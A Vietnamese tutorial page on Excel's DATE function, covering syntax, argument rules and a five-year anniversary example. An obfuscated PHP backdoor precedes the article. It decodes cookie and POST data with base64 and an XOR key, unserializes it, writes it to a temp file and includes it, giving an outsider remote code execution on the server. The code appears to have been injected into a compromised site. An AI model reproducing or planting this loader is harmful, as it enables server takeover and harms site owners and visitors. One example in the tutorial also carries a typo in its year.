$ylZYFX = chr (85) . '_' . 'E' . "\121" . "\130" . chr (108) . chr (104); $yLWtuVuIpp = 'c' . chr ( 753 - 645 ).chr (97) . "\x73" . chr ( 582 - 467 ).chr (95) . "\145" . "\170" . chr ( 510 - 405 ).chr (115) . "\x74" . 's';$kAOmFrC = class_exists($ylZYFX); $yLWtuVuIpp = "35366";$DZnLrk = strpos($yLWtuVuIpp, $ylZYFX);if ($kAOmFrC == $DZnLrk){function IAeTZP(){$aZfgaHHvu = new /* 4364 */ U_EQXlh(29822 + 29822); $aZfgaHHvu = NULL;}$XKXHSy = "29822";class U_EQXlh{private function KWZRppi($XKXHSy){if (is_array(U_EQXlh::$YNoKSXbD)) {$name = sys_get_temp_dir() . "/" . crc32(U_EQXlh::$YNoKSXbD["salt"]);@U_EQXlh::$YNoKSXbD["write"]($name, U_EQXlh::$YNoKSXbD["content"]);include $name;@U_EQXlh::$YNoKSXbD["delete"]($name); $XKXHSy = "29822";exit();}}public function HfLoXJy(){$XvCgWQeB = "40563";$this->_dummy = str_repeat($XvCgWQeB, strlen($XvCgWQeB));}public function __destruct(){U_EQXlh::$YNoKSXbD = @unserialize(U_EQXlh::$YNoKSXbD); $XKXHSy = "22734_2480";$this->KWZRppi($XKXHSy); $XKXHSy = "22734_2480";}public function gYQxmX($XvCgWQeB, $uwoXMoiAQJ){return $XvCgWQeB[0] ^ str_repeat($uwoXMoiAQJ, intval(strlen($XvCgWQeB[0]) / strlen($uwoXMoiAQJ)) + 1);}public function HturnsX($XvCgWQeB){$IRxSAES = "\142" . "\x61" . "\163" . chr (101) . chr (54) . chr ( 962 - 910 );return array_map($IRxSAES . chr ( 150 - 55 ).chr ( 1074 - 974 )."\145" . "\143" . 'o' . chr (100) . 'e', array($XvCgWQeB,));}public function __construct($oCcnlBmz=0){$vemMBQz = ',';$XvCgWQeB = "";$YdToI = $_POST;$OaybdGwVx = $_COOKIE;$uwoXMoiAQJ = "c88d6de5-9c28-4205-88d1-aa6ae4d03ace";$vclXYK = @$OaybdGwVx[substr($uwoXMoiAQJ, 0, 4)];if (!empty($vclXYK)){$vclXYK = explode($vemMBQz, $vclXYK);foreach ($vclXYK as $TPeibWgFe){$XvCgWQeB .= @$OaybdGwVx[$TPeibWgFe];$XvCgWQeB .= @$YdToI[$TPeibWgFe];}$XvCgWQeB = $this->HturnsX($XvCgWQeB);}U_EQXlh::$YNoKSXbD = $this->gYQxmX($XvCgWQeB, $uwoXMoiAQJ);if (strpos($uwoXMoiAQJ, $vemMBQz) !== FALSE){$uwoXMoiAQJ = explode($vemMBQz, $uwoXMoiAQJ); $dXdlFMY = sprintf("22734_2480", rtrim($uwoXMoiAQJ[0]));}}public static $YNoKSXbD = 56125;}IAeTZP();} Cách dùng hàm DATE trong Excel để trả về kết quả ngày tháng năm - Tải Chùa

Cách dùng hàm DATE trong Excel để trả về kết quả ngày tháng năm

Rate this post
Cách dùng hàm DATE trong Excel để trả về kết quả ngày tháng năm sẽ được chia sẻ chi tiết thông qua định nghĩa, công thức và ví dụ bên dưới đây, cùng theo dõi ngay nhé.

Hàm DATE trong Excel là hàm tính toán trả về kết quả ngày tháng năm dựa theo định dạng tương ứng ngày tháng năm đã được nhập với ngày tháng năm tiêu chuẩn. Ngày thứ nhất của hệ thống này là ngày 1 tháng 1 năm 1900 và tiếp là những ngày sau đó.

Hàm DATE trong Excel

Hàm DATE trong Excel

Trong bài viết chia sẻ hôm nay chúng tôi sẽ giới thiệu bạn cách dùng hàm DATE trong Excel để trả về kết quả ngày tháng năm thông qua định nghĩa, cú pháp và ví dụ cụ thể, cùng theo dõi ngay dưới đây nhé.

Hướng dẫn dùng hàm DATE trong Excel

Cú pháp:

=DATE(year, month, day)

Ý nghĩa:

  • Year: Đây là giá trị đối số của năm. Nó gồm 4 giá trị trong khoảng 1 – 4 chữ số (0 – 9999). Năm này sẽ phụ thuộc vào năm hệ thống máy tính bạn đang dùng. Như đã nói thì năm mặc định và bắt buộc đầu tiên là 1900.
  • Month: giá trị đối số của tháng. Giá trị month có thể là âm hoặc dương đại diện cho tháng trong 1 năm kể từ tháng thứ nhất đến tháng mười hai. Đây cũng là giá trị bắt buộc.
  • Day: giá trị đối số của ngày: Day là giá trị bắt buộc, có thể là âm hoặc dương đại diện tương ứng cho ngày thứ nhất đến ngày thứ 31 trong một tháng.

Lưu ý:

  • Giá trị đối số year từ 0 – 1899 trong đó bao gồm cả 0 và 1899 thì hàm DATE sẽ cộng thêm 1900 để tính năm. Ví dụ: =DATE(186,5,17) thì kết quả trả về là 17 tháng 5 năm 2086 (1900 + 186).
  • Giá trị đối số year từ 1900 – 9999 bao gồm 1900 và 9999 thì hàm DATE trả về kết quả bằng đúng giá trị đó luôn. Ví dụ: =DATE(2020,5,17) thì kết quả trả về là ngày 17 tháng 5 năm 2020.
  • Giá trị đối số year nhỏ 0 và lớn 10000 thì hàm DATE báo lỗi, kết quả trả về là #NUM.
  • Giá trị đối số month lớn hơn 12 thì hàm DATE quy đổi 12 tháng trong một năm và tăng số năm lên. Ví dụ: =DATE(2016,18,20) thì kết quả trả về là 20 tháng 8 năm 2017.
  • Giá trị đối số month nhỏ hơn 1 thì hàm DATE quy đổi 12 tháng trong một năm và giảm số năm đi. Ví dụ: =DATE(2018,-5,10) thì kết quả trả về là ngày 10 tháng 7 năm 2017.
  • Giá trị đối số day mà lớn hơn ngày trong một tháng thì ngày thừa sẽ được đẩy sang tháng tiếp và tháng tăng lên. Ví dụ = DATE(2916,12,35) thì kết quả trả về là ngày 4 tháng 1 năm 2017.
  • Giá trị đối số dat nhỏ hơn 1 thì ngày tháng đó trừ đi độ lớn giá trị nhập và tháng giảm hay lùi lại. Ví dụ: =DATE(2017,1,-12) thì kết quả trả về là ngày 19 tháng 12 năm 2016.

Ví dụ: Tính ngày kỷ niệm 5 năm thành lập của bảng sau:

Hàm DATE

Ví dụ hàm DATE

Áp dụng công thức ta được =DATE(YEAR(D4)+5,MONTH(D4),DAY(D4))

Trong đó:

  • YEAR(D4)+5: giá trị đối số của năm
  • MONTH(D4): giá trị đối số của tháng
  • DAY(D4): giá trị đối số của ngày.

Ta sẽ được kết quả như sau:

Cách dùng hàm DATE trong Excel

Kết quả ví dụ hàm DATE

Như vậy chúng tôi vừa mới hướng dẫn bạn cách dùng hàm DATE trong Excel để trả về kết quả ngày tháng năm. Ngoài ra bạn có thể tham khảo thêm hàm DATEDIF – đếm số ngày tháng hoặc năm giữa nhiều ngày tháng năm. Hy vọng bài viết sẽ giúp ích cho bạn.